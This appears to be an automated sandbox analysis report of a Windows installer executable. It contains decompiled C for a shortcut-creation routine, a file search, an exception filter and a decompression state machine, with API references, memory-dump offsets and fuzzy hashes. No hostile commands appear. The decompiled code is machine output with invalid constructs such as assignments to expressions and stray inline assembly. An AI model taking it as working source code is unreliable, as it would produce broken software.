                                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                  						_t81 =  *(_t100 - 0x18);
                                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                  						if(_t58 != 0) {
                                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                  							_t81 =  *(_t100 - 0x18);
                                                  						}
                                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                  						}
                                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                  						if(_t95 >= _t75) {
                                                  							_t95 = 0x80004005;
                                                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
                                                  								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
                                                  							}
                                                  						}
                                                  						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                  					}
                                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                  					if(_t95 >= _t75) {
                                                  						_push(0xfffffff4);
                                                  					} else {
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				E00401423();
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
                                                  				return 0;
                                                  			}






















                                                  APIs
                                                  • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 123533781-1104044542
                                                  • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                  • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                  • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                  • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E100057F4(struct _EXCEPTION_POINTERS* _a4) {
                                                  
                                                  				SetUnhandledExceptionFilter(0);
                                                  				return UnhandledExceptionFilter(_a4);
                                                  			}




                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,10006BFE,?,?,?,00000000), ref: 100057F9
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 10005802
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 7a186e50e94c68366ece4b0a4fa88182fe4990e1dae7649d273436561e684ccc
                                                  • Instruction ID: d2295511bf7f6119e441c0d4ef02c9b13b0a507d50578b67acd8ddff33285d7a
                                                  • Opcode Fuzzy Hash: 7a186e50e94c68366ece4b0a4fa88182fe4990e1dae7649d273436561e684ccc
                                                  • Instruction Fuzzy Hash: 77B09232084218BBEB002B91DC49B587F68FF04B52F84C010F64E44861CBB2D4108A92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E00402671(char __ebx, char* __edi, char* __esi) {
                                                  				void* _t19;
                                                  
                                                  				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                                  					E00405B25(__edi, _t6);
                                                  					_push(_t19 - 0x170);
                                                  					_push(__esi);
                                                  					E00405BC7();
                                                  				} else {
                                                  					 *__edi = __ebx;
                                                  					 *__esi = __ebx;
                                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                  				}
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                  • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                  • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                  • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E00406354(signed int __ebx, signed int* __esi) {
                                                  				signed int _t367;
                                                  				signed int _t396;
                                                  				signed int _t413;
                                                  				signed int _t414;
                                                  				signed int* _t417;
                                                  				void* _t419;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					_t417 = __esi;
                                                  					_t396 = __ebx;
                                                  					if( *(_t419 - 0x34) == 0) {
                                                  						break;
                                                  					}
                                                  					L55:
                                                  					__eax =  *(__ebp - 0x38);
                                                  					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  					__ecx = __ebx;
                                                  					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  					__ebx = __ebx + 8;
                                                  					while(1) {
                                                  						L56:
                                                  						if(__ebx < 0xe) {
                                                  							goto L0;
                                                  						}
                                                  						L57:
                                                  						__eax =  *(__ebp - 0x40);
                                                  						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                  						__ecx = __eax;
                                                  						__esi[1] = __eax;
                                                  						__ecx = __eax & 0x0000001f;
                                                  						if(__cl > 0x1d) {
                                                  							L9:
                                                  							_t414 = _t413 | 0xffffffff;
                                                  							 *_t417 = 0x11;
                                                  							L10:
                                                  							_t417[0x147] =  *(_t419 - 0x40);
                                                  							_t417[0x146] = _t396;
                                                  							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
                                                  							L11:
                                                  							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
                                                  							_t417[0x26ea] =  *(_t419 - 0x30);
                                                  							E00406AC3( *(_t419 + 8));
                                                  							return _t414;
                                                  						}
                                                  						L58:
                                                  						__eax = __eax & 0x000003e0;
                                                  						if(__eax > 0x3a0) {
                                                  							goto L9;
                                                  						}
                                                  						L59:
                                                  						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                  						__ebx = __ebx - 0xe;
                                                  						_t94 =  &(__esi[2]);
                                                  						 *_t94 = __esi[2] & 0x00000000;
                                                  						 *__esi = 0xc;
                                                  						while(1) {
                                                  							L60:
                                                  							__esi[1] = __esi[1] >> 0xa;
                                                  							__eax = (__esi[1] >> 0xa) + 4;
                                                  							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                  								goto L68;
                                                  							}
                                                  							L61:
                                                  							while(1) {
                                                  								L64:
                                                  								if(__ebx >= 3) {
                                                  									break;
                                                  								}
                                                  								L62:
                                                  								if( *(__ebp - 0x34) == 0) {
                                                  									goto L159;
                                                  								}
                                                  								L63:
                                                  								__eax =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  								__ecx = __ebx;
                                                  								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  								__ebx = __ebx + 8;
                                                  							}
                                                  							L65:
                                                  							__ecx = __esi[2];
                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                  							__ebx = __ebx - 3;
                                                  							_t108 = __ecx + 0x4073e8; // 0x121110
                                                  							__ecx =  *_t108;
                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                  							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                  							__ecx = __esi[1];
                                                  							__esi[2] = __esi[2] + 1;
                                                  							__eax = __esi[2];
                                                  							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                  							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                  								goto L64;
                                                  							}
                                                  							L66:
                                                  							while(1) {
                                                  								L68:
                                                  								if(__esi[2] >= 0x13) {
                                                  									break;
                                                  								}
                                                  								L67:
                                                  								_t119 = __esi[2] + 0x4073e8; // 0x4000300
                                                  								__eax =  *_t119;
                                                  								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                  								_t126 =  &(__esi[2]);
                                                  								 *_t126 = __esi[2] + 1;
                                                  							}
                                                  							L69:
                                                  							__ecx = __ebp - 8;
                                                  							__edi =  &(__esi[0x143]);
                                                  							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                  							__eax = 0;
                                                  							 *(__ebp - 8) = 0;
                                                  							__eax =  &(__esi[3]);
                                                  							 *__edi = 7;
                                                  							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                  							if(__eax != 0) {
                                                  								L72:
                                                  								 *__esi = 0x11;
                                                  								while(1) {
                                                  									L157:
                                                  									_t367 =  *_t417;
                                                  									if(_t367 > 0xf) {
                                                  										break;
                                                  									}
                                                  									L1:
                                                  									switch( *((intOrPtr*)(_t367 * 4 +  &M00406A83))) {
                                                  										case 0:
                                                  											L101:
                                                  											__eax = __esi[4] & 0x000000ff;
                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                  											__eax = __esi[5];
                                                  											__esi[2] = __esi[5];
                                                  											 *__esi = 1;
                                                  											goto L102;
                                                  										case 1:
                                                  											L102:
                                                  											__eax = __esi[3];
                                                  											while(1) {
                                                  												L105:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L103:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L159;
                                                  												}
                                                  												L104:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L106:
                                                  											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                  											__ecx = __esi[2];
                                                  											__eax = __esi[2] + __eax * 4;
                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                  											__ecx =  *__eax & 0x000000ff;
                                                  											__eflags = __ecx;
                                                  											if(__ecx != 0) {
                                                  												L108:
                                                  												__eflags = __cl & 0x00000010;
                                                  												if((__cl & 0x00000010) == 0) {
                                                  													L110:
                                                  													__eflags = __cl & 0x00000040;
                                                  													if((__cl & 0x00000040) == 0) {
                                                  														goto L125;
                                                  													}
                                                  													L111:
                                                  													__eflags = __cl & 0x00000020;
                                                  													if((__cl & 0x00000020) == 0) {
                                                  														goto L9;
                                                  													}
                                                  													L112:
                                                  													 *__esi = 7;
                                                  													goto L157;
                                                  												}
                                                  												L109:
                                                  												__esi[2] = __ecx;
                                                  												__esi[1] = __eax;
                                                  												 *__esi = 2;
                                                  												goto L157;
                                                  											}
                                                  											L107:
                                                  											__esi[2] = __eax;
                                                  											 *__esi = 6;
                                                  											goto L157;
                                                  										case 2:
                                                  											L113:
                                                  											__eax = __esi[2];
                                                  											while(1) {
                                                  												L116:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L114:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L159;
                                                  												}
                                                  												L115:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L117:
                                                  											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  											__ecx = __eax;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - __eax;
                                                  											__eflags = __ebx;
                                                  											__eax = __esi[4] & 0x000000ff;
                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                  											__eax = __esi[6];
                                                  											__esi[2] = __esi[6];
                                                  											 *__esi = 3;
                                                  											goto L118;
                                                  										case 3:
                                                  											L118:
                                                  											__eax = __esi[3];
                                                  											while(1) {
                                                  												L121:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L119:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L159;
                                                  												}
                                                  												L120:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L122:
                                                  											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                  											__ecx = __esi[2];
                                                  											__eax = __esi[2] + __eax * 4;
                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                  											__ecx =  *__eax & 0x000000ff;
                                                  											__eflags = __cl & 0x00000010;
                                                  											if((__cl & 0x00000010) == 0) {
                                                  												L124:
                                                  												__eflags = __cl & 0x00000040;
                                                  												if((__cl & 0x00000040) != 0) {
                                                  													goto L9;
                                                  												}
                                                  												L125:
                                                  												__esi[3] = __ecx;
                                                  												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                  												__esi[2] = __eax;
                                                  												goto L157;
                                                  											}
                                                  											L123:
                                                  											__esi[2] = __ecx;
                                                  											__esi[3] = __eax;
                                                  											 *__esi = 4;
                                                  											goto L157;
                                                  										case 4:
                                                  											L126:
                                                  											__eax = __esi[2];
                                                  											while(1) {
                                                  												L129:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L127:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L159;
                                                  												}
                                                  												L128:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L130:
                                                  											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  											__ecx = __eax;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__eflags = __ebx;
                                                  											 *__esi = 5;
                                                  											goto L131;
                                                  										case 5:
                                                  											L131:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__edx = __esi[3];
                                                  											_push(__esi);
                                                  											__al = __al | 0x0000008b;
                                                  											asm("enter 0xce2b, 0x81");
                                                  											goto 0x4083ec;
                                                  										case 6:
                                                  											L133:
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											__edi =  *(__ebp - 0x30);
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												L149:
                                                  												__cl = __esi[2];
                                                  												 *__edi = __cl;
                                                  												__edi = __edi + 1;
                                                  												__eax = __eax - 1;
                                                  												 *(__ebp - 0x30) = __edi;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												goto L23;
                                                  											}
                                                  											L134:
                                                  											__ecx = __esi[0x26e8];
                                                  											__eflags = __edi - __ecx;
                                                  											if(__edi != __ecx) {
                                                  												L140:
                                                  												__esi[0x26ea] = __edi;
                                                  												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                  												__edi = __esi[0x26ea];
                                                  												__ecx = __esi[0x26e9];
                                                  												__eflags = __edi - __ecx;
                                                  												 *(__ebp - 0x30) = __edi;
                                                  												if(__edi >= __ecx) {
                                                  													__eax = __esi[0x26e8];
                                                  													__eax = __esi[0x26e8] - __edi;
                                                  													__eflags = __eax;
                                                  												} else {
                                                  													__ecx = __ecx - __edi;
                                                  													__eax = __ecx - __edi - 1;
                                                  												}
                                                  												__edx = __esi[0x26e8];
                                                  												__eflags = __edi - __edx;
                                                  												 *(__ebp - 8) = __edx;
                                                  												if(__edi == __edx) {
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __ecx - __edx;
                                                  													if(__ecx != __edx) {
                                                  														__edi = __edx;
                                                  														__eflags = __edi - __ecx;
                                                  														 *(__ebp - 0x30) = __edi;
                                                  														if(__edi >= __ecx) {
                                                  															__eax =  *(__ebp - 8);
                                                  															__eax =  *(__ebp - 8) - __edi;
                                                  															__eflags = __eax;
                                                  														} else {
                                                  															__ecx = __ecx - __edi;
                                                  															__eax = __ecx;
                                                  														}
                                                  													}
                                                  												}
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													goto L160;
                                                  												} else {
                                                  													goto L149;
                                                  												}
                                                  											}
                                                  											L135:
                                                  											__eax = __esi[0x26e9];
                                                  											__edx =  &(__esi[0x6e8]);
                                                  											__eflags = __eax - __edx;
                                                  											if(__eax == __edx) {
                                                  												goto L140;
                                                  											}
                                                  											L136:
                                                  											__edi = __edx;
                                                  											__eflags = __edi - __eax;
                                                  											if(__edi >= __eax) {
                                                  												__ecx = __ecx - __edi;
                                                  												__eflags = __ecx;
                                                  												__eax = __ecx;
                                                  											} else {
                                                  												__eax = __eax - __edi;
                                                  												__eax = __eax - 1;
                                                  											}
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L149;
                                                  											} else {
                                                  												goto L140;
                                                  											}
                                                  										case 7:
                                                  											L150:
                                                  											__eflags = __ebx - 7;
                                                  											if(__ebx > 7) {
                                                  												__ebx = __ebx - 8;
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                  												_t351 = __ebp - 0x38;
                                                  												 *_t351 =  *(__ebp - 0x38) - 1;
                                                  												__eflags =  *_t351;
                                                  											}
                                                  											goto L152;
                                                  										case 8:
                                                  											L4:
                                                  											while(_t396 < 3) {
                                                  												if( *(_t419 - 0x34) == 0) {
                                                  													goto L159;
                                                  												} else {
                                                  													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
                                                  													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
                                                  													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
                                                  													_t396 = _t396 + 8;
                                                  													continue;
                                                  												}
                                                  											}
                                                  											_t396 = _t396 - 3;
                                                  											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
                                                  											_t377 =  *(_t419 - 0x40) & 0x00000007;
                                                  											asm("sbb ecx, ecx");
                                                  											_t379 = _t377 >> 1;
                                                  											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
                                                  											if(_t379 == 0) {
                                                  												L24:
                                                  												 *_t417 = 9;
                                                  												_t407 = _t396 & 0x00000007;
                                                  												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
                                                  												_t396 = _t396 - _t407;
                                                  												goto L157;
                                                  											}
                                                  											L6:
                                                  											_t382 = _t379 - 1;
                                                  											if(_t382 == 0) {
                                                  												L13:
                                                  												__eflags =  *0x42dbb8;
                                                  												if( *0x42dbb8 != 0) {
                                                  													L22:
                                                  													_t383 =  *0x40942c; // 0x9
                                                  													_t417[4] = _t383;
                                                  													_t384 =  *0x409430; // 0x5
                                                  													_t417[4] = _t384;
                                                  													_t385 =  *0x42ca34; // 0x0
                                                  													_t417[5] = _t385;
                                                  													_t386 =  *0x42ca30; // 0x0
                                                  													_t417[6] = _t386;
                                                  													L23:
                                                  													 *_t417 =  *_t417 & 0x00000000;
                                                  													goto L157;
                                                  												} else {
                                                  													_t26 = _t419 - 8;
                                                  													 *_t26 =  *(_t419 - 8) & 0x00000000;
                                                  													__eflags =  *_t26;
                                                  													_t387 = 0x42ca38;
                                                  													do {
                                                  														L15:
                                                  														__eflags = _t387 - 0x42cc74;
                                                  														_t409 = 8;
                                                  														if(_t387 > 0x42cc74) {
                                                  															__eflags = _t387 - 0x42ce38;
                                                  															if(_t387 >= 0x42ce38) {
                                                  																__eflags = _t387 - 0x42ce98;
                                                  																if(_t387 < 0x42ce98) {
                                                  																	_t409 = 7;
                                                  																}
                                                  															} else {
                                                  																_t409 = 9;
                                                  															}
                                                  														}
                                                  														L20:
                                                  														 *_t387 = _t409;
                                                  														_t387 = _t387 + 4;
                                                  														__eflags = _t387 - 0x42ceb8;
                                                  													} while (_t387 < 0x42ceb8);
                                                  													E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t419 - 8);
                                                  													_push(0x1e);
                                                  													_pop(_t411);
                                                  													_push(5);
                                                  													_pop(_t390);
                                                  													memset(0x42ca38, _t390, _t411 << 2);
                                                  													_t421 = _t421 + 0xc;
                                                  													_t413 = 0x42ca38 + _t411;
                                                  													E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t419 - 8);
                                                  													 *0x42dbb8 =  *0x42dbb8 + 1;
                                                  													__eflags =  *0x42dbb8;
                                                  													goto L22;
                                                  												}
                                                  											}
                                                  											L7:
                                                  											_t394 = _t382 - 1;
                                                  											if(_t394 == 0) {
                                                  												 *_t417 = 0xb;
                                                  												goto L157;
                                                  											}
                                                  											L8:
                                                  											if(_t394 != 1) {
                                                  												goto L157;
                                                  											}
                                                  											goto L9;
                                                  										case 9:
                                                  											while(1) {
                                                  												L27:
                                                  												__eflags = __ebx - 0x10;
                                                  												if(__ebx >= 0x10) {
                                                  													break;
                                                  												}
                                                  												L25:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L159;
                                                  												}
                                                  												L26:
                                                  												__eax =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__ecx = __ebx;
                                                  												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L28:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__ebx = 0;
                                                  											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                  											 *(__ebp - 0x40) = 0;
                                                  											__eflags = __eax;
                                                  											__esi[1] = __eax;
                                                  											if(__eax == 0) {
                                                  												goto L53;
                                                  											}
                                                  											L29:
                                                  											_push(0xa);
                                                  											_pop(__eax);
                                                  											goto L54;
                                                  										case 0xa:
                                                  											L30:
                                                  											__eflags =  *(__ebp - 0x34);
                                                  											if( *(__ebp - 0x34) == 0) {
                                                  												goto L159;
                                                  											}
                                                  											L31:
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												L48:
                                                  												__eflags = __eax -  *(__ebp - 0x34);
                                                  												if(__eax >=  *(__ebp - 0x34)) {
                                                  													__eax =  *(__ebp - 0x34);
                                                  												}
                                                  												__ecx = __esi[1];
                                                  												__eflags = __ecx - __eax;
                                                  												__edi = __ecx;
                                                  												if(__ecx >= __eax) {
                                                  													__edi = __eax;
                                                  												}
                                                  												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
